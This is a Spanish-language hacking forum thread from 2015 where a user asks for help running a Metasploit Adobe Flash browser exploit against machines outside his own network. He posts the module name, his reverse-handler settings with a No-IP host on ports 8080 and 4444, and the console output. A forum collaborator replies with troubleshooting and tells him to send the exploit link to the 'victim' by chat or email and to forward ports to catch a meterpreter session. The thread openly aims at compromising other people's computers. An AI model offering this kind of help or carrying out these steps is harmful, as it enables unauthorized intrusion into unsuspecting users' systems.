comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Ataque Fuera de la Red con Metasploit.

  • 5 Respuestas
  • 9968 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Alex259

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Abril 21, 2015, 11:04:02 pm »
Hola, bueno escribo este post por la siguiente rason, he estado intentando aprender como hacer un ataque fuera de mi Red Local con Metasploit, ya busque información por muchos lados y encontré muy buen material pero solo te enseñan ha hacer el ataque dentro de tu Red local.... con lo cual no tengo ningún problema he podido hacerlo con éxito dentro de entornos virtualizados con Windows Xp y Windows 7, pero respecto a hacerlo fuera de la Red Local no he encontrado material bueno....

para no hacerlo muy largo pondré las características de como lo he estado intentando llevar a cabo:

- Utilizo Kali linux en su ultima versión.
- Utilizo Metasploit
-Utilizo el Exploit para internet Explorer de Adobe Flash player:   
  windows/browser/adobe_flash_worker_byte_array_uaf   (tambien he intentado con otros)

-Utilizo No-ip
-Configure el No-ip en Kali linux
-Agrege la No-ip a DDNS  en mi Módem Residencial HG532e de infinitum.
-Abri los puertos 8080 y 4444

Configuro el Exploit de la siguiente manera:

msf > use exploit/windows/browser/adobe_flash_worker_byte_array_uaf
msf exploit(adobe_flash_worker_byte_array_uaf) >

set LHOST (mi Host No-ip)    set LPORT (4444)

Exploit.....

como resultado me arroja lo siguiente:


msf exploit(adobe_flash_worker_byte_array_uaf) > exploit
[ * ] Exploit running as background job.

[ * ] Started reverse handler on 192.157.1.32:4444
msf exploit(adobe_flash_worker_byte_array_uaf) > [ * ] Using URL: No tienes permisos para ver links. Registrate o Entra con tu cuenta
[ * ]  Local IP: No tienes permisos para ver links. Registrate o Entra con tu cuenta
[ * ] Server started.

perdonen mi ignorancia pero ¿no debería de aparecer mi no-ip en URL a usar?

¿Que estoy haciendo mal?

Agradecería mucho sus comentarios y ayuda....  tengo barios meses intentando lograr este tipo de ataque sin ningún éxito.
« Última modificación: Abril 21, 2015, 11:20:01 pm por Alex259 »

Conectado Cl0udswX

  • *
  • Colaborador
  • *
  • Mensajes: 869
  • Actividad:
    1.67%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #1 en: Abril 24, 2015, 03:13:14 pm »
Saludos hermano,

Me parece que NoIP te da una direccion (generalmente es un nombre de dominio) para que puedas usarla y configurarla en los fines que necesites, pero internamente manejan las direcciones asignando una direccion que aplicque para "cualquier conexion" sin importar la IP que tengas asignada en ese momento, por ejemplo 0.0.0.0 que desde el punto de vista de enrutamiento significa "cualquier direccion".

En resumen la URL que usa el exploit (la que te marque en rojo) no es mas que el mismo nombre de dominio que configuraste al exploit (zapdo.XXXX:1234)

[ * ] Started reverse handler on 192.157.1.32:4444
msf exploit(adobe_flash_worker_byte_array_uaf) > [ * ] Using URL: No tienes permisos para ver links. Registrate o Entra con tu cuenta
[ * ]  Local IP: No tienes permisos para ver links. Registrate o Entra con tu cuenta
[ * ] Server started.

Luego si te fijas en la direccion del dominio y tu dirección IP privada veras que al final ambas finalizan con "5VTw4Ft" esto es algo asi como "una sesion" como una forma de "tuneling" entre tu y el servidor de No-IP que te brinda el servicio.

Saludos por alla, cualquier duda estamos a tus ordenes hermano.
« Última modificación: Abril 24, 2015, 03:22:19 pm por Cl0udswX »
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Desconectado Alex259

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Abril 24, 2015, 11:23:29 pm »
bueno entonces lo estoy haciendo bien?

y si es así... cual de los 2 lincks es el que tiene que pincharse para obtener la sesión abierta?

Conectado Cl0udswX

  • *
  • Colaborador
  • *
  • Mensajes: 869
  • Actividad:
    1.67%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #3 en: Abril 26, 2015, 01:05:23 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
y si es así... cual de los 2 lincks es el que tiene que pincharse para obtener la sesión abierta?

No entendi...  :-\

A que te refieres con pincharse?

Saludos.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Desconectado Alex259

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #4 en: Abril 26, 2015, 04:43:20 am »
hehe perdón, seré mas claro..... me refería al linck que le tienes que mandar a la víctima para que le pincheo habrá o le de clic...... y al darle me habré una sesión en metasploit...


Conectado Cl0udswX

  • *
  • Colaborador
  • *
  • Mensajes: 869
  • Actividad:
    1.67%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #5 en: Abril 26, 2015, 10:31:48 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
hehe perdón, seré mas claro..... me refería al linck que le tienes que mandar a la víctima para que le pincheo habrá o le de clic...... y al darle me habré una sesión en metasploit...



Via chat, mail u otra forma deberías enviarle el link con el nombre de dominio de NO-IP.

Aunque me asalta una duda, no estoy totalmente seguro pero pensando un poco me parece que deberías redireccionar el puerto 8080 hacia el 4444 para lograr la sesión, ya que la victima te hará una petición por el puerto 8080, pero internamente tu meterpreter esta esperando por el puerto 4444, como dije anteriormente no estoy totalmente seguro ya que es posible que NAT haga el "translation" automaticamente.

Saludos por alla hermano.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


 

¿Te gustó el post? COMPARTILO!



Ayuda Metasploit "no session was created"

Iniciado por kush20

Respuestas: 3
Vistas: 376
Último mensaje Junio 03, 2018, 07:18:08 pm
por km0xu95
[SOLUCIONADO] Error al runear exploit nuevo agregado manualmente METASPLOIT.

Iniciado por snyperip

Respuestas: 1
Vistas: 1078
Último mensaje Agosto 03, 2013, 01:13:08 am
por Stuxnet
[SOLUCIONADO] Ejecutar Metasploit como programa independiente, se puede?

Iniciado por redferne

Respuestas: 7
Vistas: 1724
Último mensaje Diciembre 18, 2016, 05:32:50 pm
por redferne
[SOLUCIONADO] Problema con Remote BeEF Metasploit Plugin

Iniciado por puntoCL

Respuestas: 4
Vistas: 1330
Último mensaje Septiembre 04, 2015, 12:21:16 pm
por puntoCL
No estoy pudiendo encontrar ver a la computadora de la victima con metasploit

Iniciado por diaro

Respuestas: 5
Vistas: 453
Último mensaje Septiembre 14, 2018, 02:24:36 pm
por Polacopepo